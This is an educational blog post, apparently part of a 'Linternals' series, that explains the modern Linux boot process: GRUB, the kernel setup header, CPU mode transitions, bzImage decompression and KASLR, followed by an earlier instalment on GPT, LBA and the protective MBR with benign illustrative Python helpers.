<p>In days gone by this was a multi-stage process due to the size constraints of the old BIOS+MBR system, however nowadays the entire bootloader can be stored in the ESP and UEFI can hand control straight over. In the case of GRUB 2, this is <code>grub_main(void)</code> over in <a href="https://github.com/rhboot/grub2/blob/master/grub-core/kern/main.c">grub-core/kern/main.c</a>, so feel free to follow along.</p>
<p>First things first there&rsquo;s going to be some architecture-specific machine initialisation, like setting up the console; some rudimentary memory management; locating and loading dependencies/addons (e.g. GRUB modules); loading any configs etc.</p>
<p>With initialisation handled, the bootloader is in a position to be able to do its job. Typically modern bootloaders like GRUB will provide an interactive menu to the user, with varying degrees of features. Invariably, however, there should be the option to boot one or more kernels/operating systems.</p>
<p>As a quick aside, in GRUB this post-initialisation mode is called &ldquo;normal mode&rdquo; and we can see this in a call to <code>grub_load_normal_mode()</code> at the end of <code>grub_main()</code>, and yes, keen-eyed and battle-scarred GRUB users might notice a call to <code>grub_rescue_run ()</code> just under that. So, if normal mode falls through, we end up at the dreaded <code>grub rescue &gt;</code>&hellip;</p>
<p><img src="https://sam4k.com/content/images/2021/10/whywhy.gif" alt=""></p>
<p>Anyway, back to generic bootloader things, when we select our kernel (or more likely let the timer tick down and select the default option) - which is of course a Linux one, right?! - we begin the &ldquo;Linux Boot Protocol&rdquo; as outlined above[1] to get our chosen kernel up and running.</p>
<p>The short and sweet of this is that the bootloader will bootstrap the kernel by loading into memory the &ldquo;kernel real-mode code&rdquo;, consisting of the kernel setup and kernel boot sector, creating a memory mapping similar to the one seen below:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl">        <span class="o">~</span>                        <span class="o">~</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Protected</span><span class="o">-</span><span class="n">mode</span> <span class="n">kernel</span> <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">100000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">I</span><span class="o">/</span><span class="n">O</span> <span class="n">memory</span> <span class="n">hole</span>       <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">0</span><span class="n">A0000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Reserved</span> <span class="k">for</span> <span class="n">BIOS</span>     <span class="o">|</span> <span class="n">Leave</span> <span class="n">as</span> <span class="n">much</span> <span class="n">as</span> <span class="n">possible</span> <span class="n">unused</span>
</span></span><span class="line"><span class="cl">        <span class="o">~</span>                        <span class="o">~</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Command</span> <span class="n">line</span>          <span class="o">|</span> <span class="p">(</span><span class="n">Can</span> <span class="n">also</span> <span class="n">be</span> <span class="n">below</span> <span class="n">the</span> <span class="n">X</span><span class="o">+</span><span class="mi">10000</span> <span class="n">mark</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">X</span><span class="o">+</span><span class="mi">10000</span> <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Stack</span><span class="o">/</span><span class="n">heap</span>            <span class="o">|</span> <span class="n">For</span> <span class="n">use</span> <span class="n">by</span> <span class="n">the</span> <span class="n">kernel</span> <span class="n">real</span><span class="o">-</span><span class="n">mode</span> <span class="n">code</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="n">X</span><span class="o">+</span><span class="mi">08000</span> <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Kernel</span> <span class="n">setup</span>          <span class="o">|</span> <span class="n">The</span> <span class="n">kernel</span> <span class="n">real</span><span class="o">-</span><span class="n">mode</span> <span class="n">code</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Kernel</span> <span class="n">boot</span> <span class="n">sector</span>    <span class="o">|</span> <span class="n">The</span> <span class="n">kernel</span> <span class="n">legacy</span> <span class="n">boot</span> <span class="n">sector</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="n">X</span>       <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Boot</span> <span class="n">loader</span>           <span class="o">|</span> <span class="o">&lt;-</span> <span class="n">Boot</span> <span class="n">sector</span> <span class="n">entry</span> <span class="n">point</span> <span class="mi">0000</span><span class="p">:</span><span class="mi">7</span><span class="n">C00</span>
</span></span><span class="line"><span class="cl"><span class="mi">001000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Reserved</span> <span class="k">for</span> <span class="n">MBR</span><span class="o">/</span><span class="n">BIOS</span> <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">000800</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">Typically</span> <span class="n">used</span> <span class="n">by</span> <span class="n">MBR</span> <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">000600</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">        <span class="o">|</span>  <span class="n">BIOS</span> <span class="n">use</span> <span class="n">only</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"><span class="mi">000000</span>  <span class="o">+------------------------+</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">...</span> <span class="n">where</span> <span class="n">the</span> <span class="n">address</span> <span class="n">X</span> <span class="n">is</span> <span class="n">as</span> <span class="n">low</span> <span class="n">as</span> <span class="n">the</span> <span class="n">design</span> <span class="n">of</span> <span class="n">the</span> <span class="n">boot</span> <span class="n">loader</span> <span class="n">permits</span><span class="o">.</span>
</span></span></code></pre></div><p>Without going down the rabbit hole, the tl;dr on &ldquo;real-mode&rdquo; is that modern processors have several &ldquo;processor modes&rdquo; (legacy modes, long mode). These control how the processor sees and manages the system memory and the tasks that use it. For legacy reasons, processors boot into real-mode and this is the mode we have been running in so far<a href="http://flint.cs.yale.edu/feng/cos/resources/BIOS/procModes.htm"></a><a href="https://en.wikipedia.org/wiki/X86-64#Operating_modes">[3]</a>.</p>
<p>One of the constraints of the &ldquo;legacy&rdquo; real-mode is a limit of 1MB of addressable RAM. Yep. Old school right? So that explains why the memory map above only goes to <code>100000</code> and why the area beyond it is labelled &ldquo;Protected-mode kernel&rdquo;, neat!</p>
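<p>To make that 1MB figure a bit more concrete, here&rsquo;s a minimal Python sketch of how real-mode turns a 16-bit segment and 16-bit offset into a physical address. The helper name <code>real_mode_address</code> is just mine for illustration, and I&rsquo;m assuming the original 20-bit address bus and ignoring A20 quirks entirely:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">ADDRESS_LINES = 20  # assumption: the original 8086-style 20-bit address bus


def real_mode_address(segment, offset):
    """Translate a real-mode segment:offset pair into a physical address."""
    # Each segment starts on a 16-byte boundary, hence the multiply by 16.
    return segment * 16 + offset


# The boot sector entry point from the memory map above (0000:7C00).
print(hex(real_mode_address(0x0000, 0x7C00)))  # 0x7c00

# 20 address lines can only reach 2**20 bytes, i.e. 1MB.
print(hex(2 ** ADDRESS_LINES))  # 0x100000
</code></pre></div>
<p>That second value is the same <code>100000</code> mark where the protected-mode kernel begins in the memory map.</p>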
<p>Back to the kernel real-mode code we&rsquo;ve loaded into memory for the kernel setup. Once loaded into memory, the bootloader will read and set fields from the kernel setup header, which can be found at a fixed offset from the start of the setup code[4].</p>
<p>This header helps define the information necessary for the bootloader to hand over control directly to the kernel setup code.</p>
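<p>If you fancy poking at this header yourself, the sketch below pulls a few fields out of the start of a kernel image. The offsets (<code>0x1F1</code>, <code>0x1FE</code>, <code>0x202</code>, <code>0x206</code>) are the ones listed in the x86 boot protocol documentation[1]; the function name <code>read_setup_header</code> and the choice of fields are my own, so treat it as a rough illustration rather than what any bootloader actually does:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def read_setup_header(image):
    """Pull a few setup header fields out of the start of a bzImage."""
    # The header carries the magic "HdrS" at offset 0x202.
    if image[0x202:0x206] != b"HdrS":
        raise ValueError("no setup header magic found")
    # The boot protocol version is stored as (major * 256) + minor.
    version = int.from_bytes(image[0x206:0x208], "little")
    return {
        "setup_sects": image[0x1F1],  # size of the setup code in 512-byte sectors
        "boot_flag": int.from_bytes(image[0x1FE:0x200], "little"),
        "version": (version // 256, version % 256),
    }
</code></pre></div>
<p>Feed it the first few hundred bytes of something like <code>/boot/vmlinuz-linux</code> (you&rsquo;ll probably need root to read it) and <code>boot_flag</code> should come back as <code>0xAA55</code>.</p>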
<h3 id="wait-this-is-optional">Wait This Is Optional?</h3>
<p>The keen-eyed of you will be wondering why the section was titled &ldquo;Optional Bootloader&rdquo; - after all that all seemed kinda crucial right? Well, harnessing the flexibility and power of UEFI over Legacy BIOS, &ldquo;the Linux kernel supports EFISTUB booting which allows <a href="https://wiki.archlinux.org/title/EFI"><strong>EFI</strong></a> firmware to load the kernel as an EFI executable&rdquo;<a href="https://wiki.archlinux.org/title/EFISTUB">[5]</a>.</p>
<p>However, bear in mind that there are tradeoffs between using EFISTUB and the more feature-rich bootloaders-of-old like GRUB 2.</p>
<ol>
<li>For x86, we can find this in <a href="https://github.com/torvalds/linux/blob/master/Documentation/x86/boot.rst"><code>linux/documentation/ARCH/boot[ing].rst</code></a></li>
<li>See <code>grub_main(void)</code> over in <a href="https://github.com/rhboot/grub2/blob/master/grub-core/kern/main.c">grub-core/kern/main.c</a>, first thing we call is arch specific <code>grub_machine_init()</code>.</li>
<li><a href="https://en.wikipedia.org/wiki/X86-64#Operating_modes">https://en.wikipedia.org/wiki/X86-64#Operating_modes</a></li>
<li>For x86 we can see this action over in <a href="https://github.com/torvalds/linux/blob/0adb32858b0bddf4ada5f364a84ed60b196dbcda/arch/x86/boot/header.S#L297"><code>/arch/x86/boot/header.S</code></a></li>
<li><a href="https://wiki.archlinux.org/title/EFISTUB">https://wiki.archlinux.org/title/EFISTUB</a></li>
</ol>
<h2 id="0x04-the-kernel-setup">0x04 The Kernel (Setup)</h2>
<p><img src="https://sam4k.com/content/images/2021/12/are_we_there_yet.gif" alt=""></p>
<p>Okay, so we&rsquo;re not QUITE in the kernel proper yet, we still need to run the kernel setup code (<code>/arch/x86/boot/header.S</code> for x86) in order to basically get a suitable environment up and running to be able to run <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/main.c">arch/x86/boot/main.c</a> in real mode, the first bit of C code! And THEN we can start to look into loading the rest of the kernel into memory. Anyway:</p>
<h3 id="getting-to-main">Getting to Main</h3>
<p>In order to get to main, header.S does some housekeeping to make sure everything is how it should be. This includes making sure all the segment register values are aligned, setting up the stack and BSS area, as well as some error handling in the form of checking a setup signature to ensure everything&rsquo;s looking good before jumping to main.</p>
<h3 id="the-first-c">The First C</h3>
<p>It&rsquo;s all starting to kick off now! Except we&rsquo;re still not technically in the kernel yet, as that&rsquo;s still sat in a compressed image, waiting to be freed![1] For the sake of brevity, I&rsquo;m going to quickly cover some of the key steps we take after running <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/main.c">arch/x86/boot/main.c</a> in order to ultimately decompress the kernel and run the actual kernel.</p>
<p>Initialisation, initialisation and then some more initialisation! During this stage the heap, console, keyboard, video mode and more are initialised. Furthermore, CPU validation is carried out as well as memory detection in order to provide a map of available RAM to the kernel.</p>
<p>Another important part of the setup is the transition into protected mode and then 64-bit mode. Remember earlier we mentioned how we&rsquo;ve been running in real-mode, one of several processor modes, which comes with a limit of 1MB addressable RAM?</p>
<p>The last task of <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/main.c">arch/x86/boot/main.c</a> is to shed those shackles and enable the transition into protected mode; the tl;dr is this is a more powerful mode with full access to the system&rsquo;s memory, multitasking and support for virtual memory. After setting up the Interrupt &amp; Global Descriptor Tables (IDT, GDT) among other things, we jump to the 32-bit protected mode entry point.</p>
<h3 id="and-back-to-assembly">And Back To Assembly</h3>
<p>Yep, that&rsquo;s right, the 32-bit entry point is defined in <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/head_64.S">arch/x86/boot/compressed/head_64.S</a> and will cover some more setup, similar to what we saw for real-mode, as well as enabling the transition into long mode AKA 64-bit mode. So many modes, right?</p>
<p>Well, technically 64-bit mode is an enhancement of protected mode and is the native mode for <a href="https://en.wikipedia.org/wiki/X86-64">x86_64</a> processors. It provides additional features and capabilities; allowing the CPU to take advantage of 64-bit processing.</p>
<p>During this stage some more setup occurs, the GDT is updated, page tables are initialised and after entering 64-bit mode, we jump to the 64-bit entry point in <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/head_64.S">head_64.S</a>.</p>
<h3 id="decompression-time">Decompression Time!</h3>
<p><img src="https://sam4k.com/content/images/2021/12/unpacking.gif" alt=""></p>
<h4 id="first-some-background">First Some Background</h4>
<p>Okay, there&rsquo;s a lot to unpack here (haha), so I&rsquo;ll try to keep things brief. At boot time, the kernel is typically sat on disk as a compressed image. You can check this out for yourself:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[sam4k ~]$ ls /boot
</span></span><span class="line"><span class="cl">...  efi  grub  ...  vmlinuz-linux
</span></span><span class="line"><span class="cl">[sam4k ~]$ file /boot/vmlinuz-linux 
</span></span><span class="line"><span class="cl">/boot/vmlinuz-linux: Linux kernel x86 boot executable bzImage ...
</span></span></code></pre></div><p>With a little peek, we can see our kernel as it&rsquo;s stored on disk! You&rsquo;ll notice a couple of things here, one being that the kernel is compressed as a <code>bzImage</code> and that it&rsquo;s an executable?!</p>
<p>The <code>bzImage</code>, big zImage, format was developed (unsurprisingly) to tackle size limitations for a growing Linux kernel. Although originally compressed with gzip, newer kernels support a wider range of algorithms, including LZMA &amp; bzip2<a href="https://en.wikipedia.org/wiki/Vmlinux#bzImage">[2]</a>.</p>
<p><code>bzImage</code> files also follow a specific format, containing concatenated <code>bootsect.o</code> + <code>setup.o</code> + <code>misc.o</code> + <code>piggy.o</code>, where <code>piggy.o</code> contains a gzipped <code>vmlinux</code> file in its data section<a href="https://en.wikipedia.org/wiki/Vmlinux#bzImage">[2]</a>. Still following?</p>
<p>Now, the <code>vmlinux</code> file (notice we dropped the z) is a statically linked executable file that contains the Linux kernel in one of the object file formats supported by Linux, typically (and in this case) the Executable and Linkable Format AKA ELF<a href="https://en.wikipedia.org/wiki/Vmlinux">[3]</a>.</p>
<p>Out-of-scope for now, but the vmlinux is really neat: being an ELF means you can load it up into a debugger just like any other ELF, and make use of any symbols.</p>
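<p>As a rough illustration of that &ldquo;gzipped <code>vmlinux</code> tucked inside a <code>bzImage</code>&rdquo; idea, here&rsquo;s a small Python sketch that scans an image for a gzip stream which inflates to something starting with the ELF magic. It assumes the kernel was compressed with gzip (yours may well not be), the name <code>extract_vmlinux</code> is mine, and it holds everything in memory, so it&rsquo;s a toy rather than a replacement for proper tooling:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"  # gzip header with the deflate method byte
ELF_MAGIC = b"\x7fELF"


def extract_vmlinux(bzimage):
    """Scan a bzImage for a gzip stream that inflates to an ELF file."""
    start = bzimage.find(GZIP_MAGIC)
    while start != -1:
        try:
            # 16 + MAX_WBITS tells zlib to expect a gzip header; a
            # decompress object tolerates trailing bytes after the stream.
            inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)
            data = inflater.decompress(bzimage[start:])
        except zlib.error:
            data = b""  # false positive, those bytes were not a gzip stream
        if data.startswith(ELF_MAGIC):
            return data
        start = bzimage.find(GZIP_MAGIC, start + 1)
    return None
</code></pre></div>
<p>If it returns <code>None</code> on your image, the likely explanation is simply that your kernel uses one of the other compression formats mentioned above.</p>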
<h4 id="back-to-decompression">Back To Decompression</h4>
<p>Okay, we&rsquo;d just jumped to the 64-bit entry point in <a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/head_64.S">arch/x86/boot/compressed/head_64.S</a> after transitioning to 64-bit mode.</p>
<p>Like the last mode transition, there&rsquo;s some more low-level housekeeping done, including figuring out where the decompressed kernel&rsquo;s going to go, copying the compressed kernel there and then preparing the params for the <code>extract_kernel</code> function<a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/misc.c">[4]</a>!</p>
<p>As a security nerd, I have to point out that one of these parameters, the output location of the decompressed kernel, involves a call to <code>choose_random_location</code><a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/kaslr.c">[5]</a> - this is integral to providing kernel address space layout randomization by randomizing where the kernel code is placed at boot time<a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization">[6]</a>.</p>
<p>Some checks and a <code>__decompress</code> call later, the kernel is decompressed. The decompression is done in place (remember we made a copy of the compressed kernel earlier). However, we still need to move the now decompressed kernel to the right place, and that&rsquo;s where <code>parse_elf</code> (remember the kernel image is an ELF executable!) and <code>handle_relocations</code> come in[7].</p>
<p>The tl;dr on these functions is that they check the ELF header, load the various segments into memory (bearing in mind our KASLR), adjust kernel addresses as necessary and finally move everything to the right place in memory.</p>
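<p>To give a flavour of the &ldquo;check the ELF header, find the loadable segments&rdquo; part, here&rsquo;s a hedged Python sketch that walks the program headers of a 64-bit little-endian ELF and lists its <code>PT_LOAD</code> segments. The field offsets come from the ELF64 format; the helper names (<code>le</code>, <code>loadable_segments</code>) are made up for this post and this is only loosely modelled on the idea behind <code>parse_elf</code>, not a port of it:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">PT_LOAD = 1  # program header type for loadable segments


def le(data, offset, size):
    """Read a little-endian unsigned integer out of a byte string."""
    return int.from_bytes(data[offset:offset + size], "little")


def loadable_segments(elf):
    """List (file offset, physical address, file size) per PT_LOAD segment."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not a valid ELF file")
    # ELF64 header fields: where the program headers live, how big each
    # one is and how many there are.
    phoff = le(elf, 0x20, 8)
    phentsize = le(elf, 0x36, 2)
    phnum = le(elf, 0x38, 2)

    segments = []
    for i in range(phnum):
        ph = elf[phoff + i * phentsize:phoff + (i + 1) * phentsize]
        if le(ph, 0, 4) == PT_LOAD:
            # p_offset, p_paddr and p_filesz of a 64-bit program header
            segments.append((le(ph, 8, 8), le(ph, 24, 8), le(ph, 32, 8)))
    return segments
</code></pre></div>
<p>Each tuple is essentially a &ldquo;copy this many bytes from here in the file to there in memory&rdquo; instruction, which is the bit that then has to be adjusted for wherever KASLR decided the kernel should live.</p>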
<p>Next? After extract is complete, we jump to the kernel!</p>
<ol>
<li>You can check this out for yourself by exploring your <code>/boot/</code> folder</li>
<li><a href="https://en.wikipedia.org/wiki/Vmlinux#bzImage">https://en.wikipedia.org/wiki/Vmlinux#bzImage</a></li>
<li><a href="https://en.wikipedia.org/wiki/Vmlinux">https://en.wikipedia.org/wiki/Vmlinux</a></li>
<li><a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/misc.c">arch/x86/boot/compressed/misc.c</a></li>
<li><a href="https://github.com/torvalds/linux/blob/v4.16/arch/x86/boot/compressed/kaslr.c">arch/x86/boot/compressed/kaslr.c</a></li>
<li><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization">https://en.wikipedia.org/wiki/Address_space_layout_randomization#Kernel_address_space_layout_randomization</a></li>
<li>You can find the src for these functions over in <a href="https://github.com/torvalds/linux/blob/master/arch/x86/boot/compressed/misc.c">/arch/x86/boot/compressed/misc.c</a></li>
</ol>
<h2 id="0x05-the-kernel-initialisation">0x05 The Kernel (Initialisation)</h2>
<p><img src="https://sam4k.com/content/images/2021/12/jklol.gif" alt=""></p>
<p>Yep, this fella is turning into a 3-part epic. Apologies! Tune in next time where we&rsquo;ll cover the last two phases of the boot process I want to cover (hopefully in one post&hellip;):</p>
<ul>
<li>0x05 The Kernel (Initialisation)</li>
<li>0x06 Systemd (Yikes)</li>
</ul>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The (Modern) Boot Process [0x01]</title><description>What more appropriate way to kick off a series on Linux internals than figuring out how we actually get those internals running in the first place? This post is going to cover the process that takes us from pressing a po</description><link>https://sam4k.com/linternals-the-modern-boot-process-part-1/</link><guid isPermaLink="false">612609ada6be9c0727d014a7</guid><category>linux</category><category>kernel</category><dc:creator>sam4k</dc:creator><pubDate>Sun, 26 Sep 2021 14:12:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2021/08/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>What more appropriate way to kick off a series on Linux internals than figuring out how we actually get those internals running in the first place? This post is going to cover the process that takes us from pressing a power button, to a fully usable Linux operating system.  </p>
<p>As I mentioned in the introduction post for this series, I&rsquo;m going to focus primarily on modern technologies and implementations where possible. So for this post I&rsquo;ll be covering how UEFI reads our hard drive&rsquo;s GPT to figure out how to find our Linux kernel. Once the kernel&rsquo;s loaded in memory and ready to go, we look at how it uses systemd to get the operating system up and running in a usable state for us.</p>
<p><img src="https://sam4k.com/content/images/2021/08/confused2.gif" alt=""></p>
<p>Confused? Don&rsquo;t worry, hopefully by the end of the post you&rsquo;ll be able to understand that last part, otherwise I need to rethink this whole series thing. Anyway, without further ado let&rsquo;s jump over to where the magic begins.</p>
<p><strong>Disclaimer</strong>: as I mentioned in my Linternals introduction, this series aims to strike a middle ground between curious Linux users and system programmers; so as a result of not diving super low, I may miss some nuances of particular hardware/implementations or otherwise generalise more complex topics.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x00-gpt">0x00 GPT</a>
<ul>
<li><a href="#lba">LBA?</a></li>
<li><a href="#a-whistle-stop-tour">A Whistle-stop Tour</a>
<ul>
<li>Protective MBR</li>
<li>Primary GPT Header</li>
<li>Partition Entries</li>
<li>Partitions</li>
<li>Secondary GPT</li>
<li>More GPT Resources</li>
</ul>
</li>
</ul>
</li>
<li><a href="#0x01-push-the-button">0x01 Push The Button!</a></li>
<li><a href="#0x02-uefi">0x02 UEFI</a>
<ul>
<li><a href="#the-esp">The ESP</a></li>
<li><a href="#csm">CSM</a></li>
</ul>
</li>
<li><a href="#0x03-optional-bootloader">Next Time</a></li>
</ul>
<h2 id="0x00-gpt">0x00 GPT</h2>
<p>Okay, before we actually turn our computer on let&rsquo;s have a look at how all our data, like the operating system we want to run, is stored on a storage device (e.g. an SSD or HDD).</p>
<p>The GUID Partition Table (GPT) scheme is a standard for formatting storage devices using, who&rsquo;d have thought it, globally unique identifiers (GUIDs). It was designed to improve upon its more limited predecessor, the Master Boot Record (MBR).</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> LBA +----------------------+ &lt;- Disk Start
</span></span><span class="line"><span class="cl"> 000 | Protective MBR       |             
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;-          
</span></span><span class="line"><span class="cl"> 001 | Primary GPT Header   |  |          
</span></span><span class="line"><span class="cl">     +----------------------+  | Primary  
</span></span><span class="line"><span class="cl"> 002 | Entry 1 | 2 | 3 | 4  |  | GPT      
</span></span><span class="line"><span class="cl">     +----------------------+  |          
</span></span><span class="line"><span class="cl"> 003 | Entries 5 |...| 128  |  |          
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;-          
</span></span><span class="line"><span class="cl"> 034 | Partition 1          |             
</span></span><span class="line"><span class="cl">     +----------------------+             
</span></span><span class="line"><span class="cl">  X  | Partition ...        |             
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;-          
</span></span><span class="line"><span class="cl"> X+1 | Entry 1 | 2 | 3 | 4  |  |          
</span></span><span class="line"><span class="cl">     +----------------------+  |          
</span></span><span class="line"><span class="cl"> X+2 | Entries 5 | ... |128 |  | Secondary
</span></span><span class="line"><span class="cl">     +----------------------+  | GPT      
</span></span><span class="line"><span class="cl">X+34 | Secondary GPT Header |  |          
</span></span><span class="line"><span class="cl">     +----------------------+ &lt;- Disk End 
</span></span></code></pre></div><h3 id="lba">LBA?</h3>
<p>Before we have a brief look at what this diagram actually means, let me quickly explain what LBA actually means. In days of old, physical blocks of memory on hard disks were addressed using the cylinder-head-sector (CHS) scheme; nowadays the newer Logical Block Addressing (LBA) is more commonly used.</p>
<p>The tl;dr is that LBA is a simple linear addressing scheme which abstracts away from the physical details of the storage device; like the whole cylinder, head, sector stuff. This means the operating system (and our diagram above) simply needs to know that blocks of memory in our storage are located by an index; such that the logical block address of the first block is 0, the second is 1 and so on.</p>
<p>On the topic of &ldquo;blocks of memory&rdquo; and layout schemes, Linux typically uses 512 bytes for its logical block size (some newer disks expose 4096-byte logical blocks instead). So <code>LBA0</code> is a 512-byte block and the &ldquo;Primary GPT&rdquo; (we&rsquo;ll worry about what that means in a second) above spans 33 blocks, <code>LBA1</code> to <code>LBA33</code>, so is <code>33*512=16896</code> bytes large.</p>
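<p>If you want to sanity check that arithmetic, here&rsquo;s a quick Python sketch. It assumes the 512-byte logical block size used above, and the helper names are just mine for illustration:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">LOGICAL_BLOCK_SIZE = 512  # assumption: 512-byte logical blocks, as in the text


def lba_to_offset(lba, block_size=LOGICAL_BLOCK_SIZE):
    """Return the byte offset at which logical block `lba` starts."""
    return lba * block_size


def span_bytes(first_lba, last_lba, block_size=LOGICAL_BLOCK_SIZE):
    """Return the size in bytes of the inclusive block range first_lba..last_lba."""
    return (last_lba - first_lba + 1) * block_size


# The Primary GPT covers LBA1 (the header) through LBA33 (the last entry block).
print(span_bytes(1, 33))   # 16896
# The first partition can start at LBA34, i.e. this many bytes into the disk.
print(lba_to_offset(34))   # 17408
</code></pre></div>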
<h3 id="a-whistle-stop-tour">A Whistle-stop Tour</h3>
<p>Now that we know that LBA is just indexing blocks of memory in our disk, we can begin to briefly go over what the rest of that gibberish means. MBR? Entries?? Partitions?!</p>
<h4 id="protective-mbr">Protective MBR</h4>
<p>&ldquo;What&rsquo;s the deal with this &ldquo;Protective MBR&rdquo;, I thought GPT replaced that?&rdquo; I hear you ask, and that&rsquo;s an astute observation! Well, as part of the GPT scheme the first LBA of the disk - <code>LBA0</code> - is reserved for backwards compatibility with programs that are expecting an MBR.</p>
<p>However, this is not backwards compatibility in the traditional sense, and is mainly a protection mechanism to prevent programs that don&rsquo;t know about GPT from thinking the disk is unformatted or corrupt and potentially overwriting parts of our disk. To that end, the protective MBR basically defines the entire disk as one partition and sets the &ldquo;System ID&rdquo; of the partition as <code>0xEE</code>, which denotes a GPT disk.</p>
<p>This way, older programs at the very least will see a single partition of an unknown type with no free space, and generally shouldn&rsquo;t touch it. And yes, that means the old MBR scheme fit into a single 512-byte logical block!</p>
<p><img src="https://sam4k.com/content/images/2021/09/small.gif" alt=""></p>
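<p>To make the protective MBR a bit more concrete, here&rsquo;s a minimal Python sketch of how a tool might recognise one. It relies on the classic MBR layout (four 16-byte partition entries starting at byte 446, the type byte at offset 4 of each entry, and the <code>0x55 0xAA</code> signature in the last two bytes). The function names are hypothetical, it only checks the first entry, and the test block is synthetic rather than read from a real disk:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">MBR_SIZE = 512
PARTITION_TABLE_OFFSET = 446   # four 16-byte entries follow the bootstrap code
PARTITION_ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"   # last two bytes of the block
GPT_PROTECTIVE_TYPE = 0xEE


def is_protective_mbr(lba0):
    """Return True if the 512-byte block looks like a GPT protective MBR."""
    if len(lba0) != MBR_SIZE or lba0[510:512] != BOOT_SIGNATURE:
        return False
    end = PARTITION_TABLE_OFFSET + PARTITION_ENTRY_SIZE
    first_entry = lba0[PARTITION_TABLE_OFFSET:end]
    return first_entry[4] == GPT_PROTECTIVE_TYPE  # byte 4 is the partition type


def make_protective_mbr(total_sectors):
    """Build a synthetic protective MBR for demonstration purposes only."""
    block = bytearray(MBR_SIZE)
    entry = bytearray(PARTITION_ENTRY_SIZE)
    entry[4] = GPT_PROTECTIVE_TYPE
    entry[8:12] = (1).to_bytes(4, "little")   # the single partition starts at LBA1
    # Sector count is a 32-bit field, so it is capped for very large disks.
    entry[12:16] = min(total_sectors - 1, 0xFFFFFFFF).to_bytes(4, "little")
    end = PARTITION_TABLE_OFFSET + PARTITION_ENTRY_SIZE
    block[PARTITION_TABLE_OFFSET:end] = entry
    block[510:512] = BOOT_SIGNATURE
    return bytes(block)


print(is_protective_mbr(make_protective_mbr(2048)))   # True
print(is_protective_mbr(bytes(MBR_SIZE)))             # False
</code></pre></div>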
<h4 id="primary-gpt-header">Primary GPT Header</h4>
<p>Now that we&rsquo;ve mitigated against any accidental formatting at the hands of MBR zealots, we have the &ldquo;Primary GPT&rdquo; and first up is <code>LBA1</code>, the Primary GPT Header. The header block contains various metadata about the disk and GPT scheme, including the range of usable logical blocks as well as the number and size of partition entries.</p>
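<p>As a rough illustration, the fields mentioned above can be pulled out of the header block with a few little-endian reads. The offsets below follow the GPT header layout from the UEFI spec, but the helper names are mine, the header is a synthetic one built for the demo, and the sketch skips the CRC32 checks a real parser should do:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">GPT_SIGNATURE = b"EFI PART"


def le(buf, offset, size):
    """Read a little-endian unsigned integer of `size` bytes at `offset`."""
    return int.from_bytes(buf[offset:offset + size], "little")


def parse_gpt_header(block):
    """Decode the GPT header fields discussed in this post (no CRC checks)."""
    if block[0:8] != GPT_SIGNATURE:
        raise ValueError("not a GPT header")
    return {
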